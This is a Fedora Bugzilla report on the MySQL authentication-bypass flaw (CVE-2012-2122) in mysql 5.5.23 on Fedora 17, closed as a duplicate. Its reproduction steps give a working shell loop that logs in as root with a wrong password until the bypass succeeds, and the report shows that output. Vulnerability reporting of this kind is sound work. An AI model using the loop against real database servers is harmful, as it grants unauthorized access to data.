Bug 830650 - MySQL security break
MySQL security break
Status: CLOSED DUPLICATE of bug 830680
Product: Fedora
Classification: Fedora
Component: mysql (Show other bugs)
17
x86_64 Linux
unspecified Severity unspecified
: ---
: ---
Assigned To: Tom Lane
Fedora Extras Quality Assurance
: Security
Depends On:
Blocks: CVE-2012-2122
  Show dependency treegraph
 
Reported: 2012-06-11 01:43 EDT by Arthur Buliva
Modified: 2012-06-11 04:21 EDT (History)
5 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2012-06-11 04:21:47 EDT
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)

  None (edit)
Description Arthur Buliva 2012-06-11 01:43:25 EDT
Description of problem:

Any user without MySQL username/password is able to query and update databases with a hack that has recently been posted online:

Version-Release number of selected component (if applicable):
sh-4.2$ rpm -qa | grep -i mysql
mysql-connector-odbc-5.1.10-1.fc17.x86_64
mysql-5.5.23-1.fc17.x86_64
mysql-libs-5.5.23-1.fc17.x86_64
perl-DBD-MySQL-4.020-2.fc17.x86_64
mysql-workbench-5.2.40-1.fc17.x86_64
mysql-utilities-1.0.5-2.fc17.noarch
php-mysql-5.4.3-1.fc17.x86_64
mysql-server-5.5.23-1.fc17.x86_64
mysql-connector-python-0.3.2-3.fc17.noarch
sh-4.2$ uname -a
Linux wombat 3.3.7-1.fc17.x86_64 #1 SMP Mon May 21 22:32:19 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
sh-4.2$



How reproducible:


Steps to Reproduce:
1. Open terminal
2. for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done
3.
  
Actual results:
sh-4.2$ for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done
@@version
5.5.23
sh-4.2$


Expected results:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)



Additional info:
Comment 1 Jan Lieskovsky 2012-06-11 04:21:47 EDT

*** This bug has been marked as a duplicate of bug 830680 ***

Note You need to log in before you can comment on or make changes to this bug.